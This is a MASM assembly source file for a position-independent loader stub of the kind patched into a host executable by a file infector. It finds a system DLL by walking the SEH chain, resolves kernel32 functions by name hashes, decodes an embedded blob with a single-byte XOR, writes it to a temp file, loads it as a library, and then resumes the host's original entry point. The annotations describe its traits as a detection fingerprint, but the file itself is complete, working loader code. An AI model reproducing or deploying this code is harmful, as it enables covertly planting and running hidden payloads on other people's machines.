.486p
.model flat, stdcall                    ; MASM (Intel syntax), 32-bit flat model, stdcall Win32 callees
option casemap :none
;--------------------------------------------------------
; CRC16 string
;   Assembly-time CRC-32 (reflected polynomial 0EDB88320h, initial value
;   and final xor 0FFFFFFFFh) over the characters of `string`; only the
;   low 16 bits are emitted as a DW.  This must stay in step with the
;   runtime routine vStrToCRC, whose low word GetApiAddressFromList
;   compares against these entries.
CRC16 MACRO string
CRC_VALUE = 0ffffffffh
IRPC CRC_BYTE, string
CRC_VALUE = CRC_VALUE xor '&CRC_BYTE'
REPT 8
CRC_VALUE = (CRC_VALUE shr 1) xor ((CRC_VALUE and 1) * 0edb88320h)
ENDM
ENDM
CRC_VALUE = CRC_VALUE xor 0ffffffffh
dw (CRC_VALUE and 0ffffh)
ENDM
; APIDEF sym
;   Emits the CRC16 of export name `sym` into the hash list and binds
;   `sym` to the frame slot [ebp + COUNT] that GetApiAddressFromList
;   fills with the resolved address.  COUNT advances one dword per entry,
;   so slot order == hash-list order.
APIDEF MACRO sym
CRC16 sym
sym = [ebp + COUNT]
COUNT = COUNT + 4
ENDM
; VARDEF sym, vw
;   Reserves `vw` bytes of the same ebp-relative frame for a local `sym`.
VARDEF MACRO sym, vw
sym = COUNT
COUNT = COUNT + vw
ENDM
;--------------------------------------------------------
.CODE
;****************************************************************************
; _MiniLoaderStart -- position-independent loader stub
;
; Behaviour visible in this listing (useful as a detection fingerprint):
;   1. installs an SEH frame (SubEnter) and walks the fs:[0] chain to its
;      last record, then scans downward from that handler's address for an
;      'MZ'/'PE' image header to obtain a module base (the author labels
;      it KERNEL32; the code only checks for a PE header, so on systems
;      where the final handler lives in another module the export lookup
;      below would search that module instead -- unverified here);
;   2. resolves six kernel32 exports by 16-bit CRC of their names;
;   3. creates a file via GetTempPathA/GetTempFileNameA (prefix "SH"),
;      writes the blob at ModuleEntry decoded with a single-byte XOR 3Ch,
;      closes it and LoadLibraryA()s that path;
;   4. restores the SEH chain and registers and returns to the host's
;      original entry point, which is patched into the immediate at
;      HostEntryPoint (12345678h is a placeholder).
;
; Register roles after the prologue:
;   ebp = frame from `enter 80h, 0`; COUNT starts at -80h, so the first
;         APIDEF slot ([ebp-80h]) is exactly esp after enter, i.e. the
;         edi handed to GetApiAddressFromList.
;   ebx = 0 (zeroed in SubEnter, reused as NULL/0 arguments below).
;   esi = runtime address of KNLAPILIST, later of ModuleEntry.
; Control flow depends on exact instruction lengths ($-relative jumps and
; data embedded after `call $ + 8`); do not reorder or re-encode.
;****************************************************************************
_MiniLoaderStart:
        push    12345678h               ; placeholder, patched with the host entry point; consumed by the final `ret` in SubLeave
HostEntryPoint = $ - 4
        call    SubEnter                ; pushad, ebx = 0, install SEH frame, then resume here with esp -> SEH record
        mov     eax, esp                ; eax = newest SEH record
        xchg    esi, eax                ; esi = record, eax = scratch
        lodsd                           ; eax = record->prev, esi = &record->handler
        cmp     eax, -1                 ; -1 terminates the chain
        jne     $ - 5                   ; find the end of the SEH chain (loops back to the xchg, intended to land 5 bytes back)
        mov     edx, [esi]              ; edx = handler address of the last record (lies inside a system DLL)
SearchKernel32:
        dec     edx
        xor     dx, dx                  ; round down to the next 64 KiB boundary
        cmp     word ptr [edx], 'ZM'    ; IMAGE_DOS_SIGNATURE
        jne     SearchKernel32
        mov     ecx, [edx + 3ch]        ; e_lfanew
        cmp     dword ptr [edx + ecx], 'EP' ; IMAGE_NT_SIGNATURE (low word)
        jne     SearchKernel32          ; find the KERNEL32 base address (author's assumption; see header)
        call    $ + 5                   ; push address of the following pop
        pop     eax
        sub     eax, $ - vdelta - 1     ; global relocation: eax = runtime address of vdelta ($ - 1 is the assembled address of the pop)
        enter   80h, 0                  ; frame for the API slots and locals (see COUNT / APIDEF / VARDEF)
        mov     [ebp + var_delta], eax
        lea     esi, [eax + KNLAPILIST - vdelta] ; esi = runtime address of the CRC16 hash list
        mov     edi, esp                ; edi = [ebp-80h] = first API slot
        call    GetApiAddressFromList   ; look up the needed API addresses (edx = module base, esi = hash list, edi = output slots)
        mov     edi, 260                ; MAX_PATH
        sub     esp, edi                ; path buffer
        push    esp                     ; lpBuffer
        push    edi                     ; nBufferLength
        call    GetTempPathA
        mov     eax, esp                ; eax = temp directory path
        sub     esp, edi                ; file name buffer
        push    esp                     ; lpTempFileName
        push    0                       ; wUnique
        call    $ + 8                   ; lpPrefixString: pushes the address of the "SH" string below
        db      "SH", 0
        push    eax                     ; lpszPath
        call    GetTempFileNameA        ; get a temporary file name
        mov     eax, esp                ; eax = temp file name (esp still points here when LoadLibraryA is called)
        push    ebx                     ; hTemplateFile = NULL (ebx == 0)
        push    ebx                     ; dwFlagsAndAttributes = 0
        push    2                       ; CREATE_ALWAYS
        push    ebx                     ; lpSecurityAttributes = NULL
        push    0                       ; dwShareMode = 0
        push    40000000h               ; GENERIC_WRITE
        push    eax                     ; lpFileName
        call    CreateFileA
        mov     [ebp + var_hFile], eax
        inc     eax                     ; INVALID_HANDLE_VALUE (-1) -> zero
        jz      HostReturn              ; file creation failed?
        sub     esi, KNLAPILIST - ModuleEntry ; esi (restored by popad) -> ModuleEntry
        lodsd                           ; read module length
        xchg    ebx, eax                ; ebx = bytes remaining
        sub     esp, 1000h              ; 4 KiB decode buffer
        mov     edi, esp
LoopDecryptModule:
        mov     ecx, 1000h
        cmp     ebx, ecx
        jnb     $ + 4                   ; skip the mov when a full page remains
        mov     ecx, ebx                ; ecx = min(1000h, remaining)
        push    ecx
        push    edi
        lodsb
        xor     al, 3ch                 ; decrypt module file: single-byte XOR with 3Ch
        stosb
        loop    $ - 4                   ; back to lodsb for ecx bytes
        pop     edi
        pop     ecx
        sub     ebx, ecx
        push    esp                     ; temporary variable: receives lpNumberOfBytesWritten
        mov     eax, esp
        push    0                       ; lpOverlapped
        push    eax                     ; lpNumberOfBytesWritten
        push    ecx                     ; nNumberOfBytesToWrite
        push    edi                     ; lpBuffer
        push    dword ptr [ebp + var_hFile] ; hFile
        call    WriteFile
        pop     eax                     ; balance the stack (discard the temporary)
        test    ebx, ebx
        jnz     LoopDecryptModule
        add     esp, 1000h
        push    dword ptr [ebp + var_hFile] ; hFile
        call    CloseHandle
        push    esp                     ; lpLibFileName = temp file name buffer
        call    LoadLibraryA            ; load the decrypted module
HostReturn:
        leave                           ; drop the frame and everything below it
        jmp     SubLeave                ; jump back to host entry
;****************************************************************************
; SubEnter / SubLeave / InstallSEH -- register and SEH bracket around the stub
;
; SubEnter saves all registers, zeroes ebx and installs an SEH record whose
; handler is the `pop eax` sequence right after `call InstallSEH`.  Stack
; after InstallSEH, as seen from its own esp:
;   [esp]      previous fs:[0]        <- start of the SEH record
;   [esp+4]    handler (return into SubEnter)
;   [esp+8]    pushad image (8 dwords)
;   [esp+28h]  return address of `call SubEnter` -> resumed by InstallSEH
;   [esp+2Ch]  HostEntryPoint immediate
; On an exception the handler discards its own return address and the
; ExceptionRecord pointer and loads esp from EstablisherFrame (the record),
; so it falls into SubLeave instead of returning to the dispatcher.
; SubLeave unlinks the record, restores registers, drops the SubEnter
; return address and `ret`s into the host entry point.
;****************************************************************************
SubEnter:
        pushad
        xor     ebx, ebx
        call    InstallSEH
        pop     eax                     ; exception handling entry: drop handler return address
        pop     eax                     ; drop pExceptionRecord
        pop     esp                     ; esp = pEstablisherFrame (the SEH record)
SubLeave:
        xor     ebx, ebx
        pop     dword ptr fs:[ebx]      ; restore previous handler
        pop     eax                     ; discard our handler address
        popad
        add     esp, 4                  ; discard return address of `call SubEnter`
        ret                             ; pops HostEntryPoint and transfers to it
InstallSEH:
        push    dword ptr fs:[ebx]      ; record.prev
        mov     fs:[ebx], esp           ; link the new record (handler = return address pushed by `call InstallSEH`)
        jmp     [esp + 28h]             ; return address from the call to SubEnter
;****************************************************************************
; GetApiAddressFromList -- resolve exports by CRC16 of their names
;****************************************************************************
; GetApiAddressFromList
; In:    edx = module base; esi = list of CRC16 name hashes terminated by a
;        single zero byte; edi = output array of dwords
; Out:   one export address per hash stored at [edi], [edi+4], ...
; Clobb: none visible to the caller (pushad/popad), flags
;
; ebp (the caller's frame pointer) is repurposed as the name-table index
; and is NOT reset between hashes: the list must therefore appear in the
; same order as the export name table (the six names in KNLAPILIST are in
; ascending ASCII order).  No NumberOfNames bound is checked; a hash that
; is never matched runs past the end of the table and presumably faults
; into the SEH frame installed by SubEnter.  The terminator test looks at
; one byte only, so a hash whose low byte is zero would end the list early.
;****************************************************************************
GetApiAddressFromList:
        pushad
        mov     ecx, [edx + 3ch]        ; e_lfanew
        add     ecx, edx
        mov     ebx, [ecx + 78h]        ; ExportTableAddress (DataDirectory[0].VirtualAddress)
        add     ebx, edx
        or      ebp, -1                 ; counter register: name index, pre-incremented below
SearchNextAPI:
        mov     ecx, [ebx + 20h]        ; AddressOfNames
        add     ecx, edx
ContinueSearch:
        inc     ebp
        mov     eax, edx
        add     eax, [ecx + ebp * 4]    ; fetch API name string (RVA -> VA)
        call    vStrToCRC
        cmp     [esi], ax               ; compare low 16 bits of the CRC32 with the list entry
        jne     ContinueSearch
        mov     eax, [ebx + 24h]        ; AddressOfNameOrdinals
        add     eax, edx
        movzx   eax, word ptr [eax + ebp * 2]
        mov     ecx, [ebx + 1ch]        ; AddressOfFunctions
        add     ecx, edx
        mov     eax, [ecx + eax * 4]
        add     eax, edx
        stosd                           ; save API address
        inc     esi
        inc     esi                     ; next 16-bit hash
        cmp     byte ptr [esi], 0       ; the CRC16 list of API names ends with a single 0
        jne     SearchNextAPI
        popad
        ret
;--------------------------------------------------------
; CRC32     -- In: eax = buffer, ecx = byte count, edi = value swapped into
;              eax as the running CRC (no caller in this listing; confirm
;              the intended seed convention before use)
; vStrToCRC -- In: eax = NUL-terminated string.  Out: eax = CRC-32
;              (polynomial 0EDB88320h, seed and final xor 0FFFFFFFFh),
;              matching the assembly-time CRC16 macro.
; Clobb: flags only (ecx, edx, edi are saved/restored).
;--------------------------------------------------------
CRC32:
        push    ecx
        push    edx
        push    edi
        xchg    eax, edi                ; edi = buffer, eax = caller's edi
        jmp     @1
vStrToCRC:
        push    ecx
        push    edx
        push    edi
        xchg    edi, eax                ; edi = string
        xor     eax, eax                ; al = 0 for scasb
        or      ecx, -1
        repne   scasb                   ; find the NUL; ecx = -(len + 2)
        not     ecx                     ; ecx = len + 1
        dec     eax                     ; eax = 0FFFFFFFFh initial CRC
        sub     edi, ecx                ; edi back to the string start
        dec     ecx                     ; ecx = len
@1:
        xor     al, [edi]
        inc     edi
        mov     dl, 8                   ; one bit per iteration
@2:
        shr     eax, 1
        jnc     @3
        xor     eax, 0edb88320h         ; reflected CRC-32 polynomial
@3:
        dec     dl
        jnz     @2
        loop    @1
        pop     edi
        pop     edx
        pop     ecx
        not     eax                     ; final xor
        ret
;********************************************************
vdelta:                                 ; reference point for runtime relocation (see _MiniLoaderStart)
;********************************************************
; Data lives inside .CODE so the stub is one contiguous blob from
; _MiniLoaderStart to _MiniLoaderCodeEnd (presumably copied into a host
; as a unit -- not shown here).  COUNT starts at -80h so the APIDEF slots
; occupy the frame reserved by `enter 80h, 0`, in the order listed.
COUNT = -80h
KNLAPICALL = COUNT
KNLAPILIST:                             ; CRC16 hash list; order must match the export name table
APIDEF CloseHandle
APIDEF CreateFileA
APIDEF GetTempFileNameA
APIDEF GetTempPathA
APIDEF LoadLibraryA
APIDEF WriteFile
db 00h                                  ; ENDLIST
VARDEF var_delta, 4                     ; runtime address of vdelta
VARDEF var_hFile, 4                     ; handle from CreateFileA
;--------------------------------------------------------
_MiniLoaderCodeEnd:
ModuleEntry:                            ; dword length followed by the XOR-3Ch encoded blob; 1-byte placeholder here
        dd      00000001h
        db      00h
;--------------------------------------------------------
start:
        jmp     _MiniLoaderStart
end start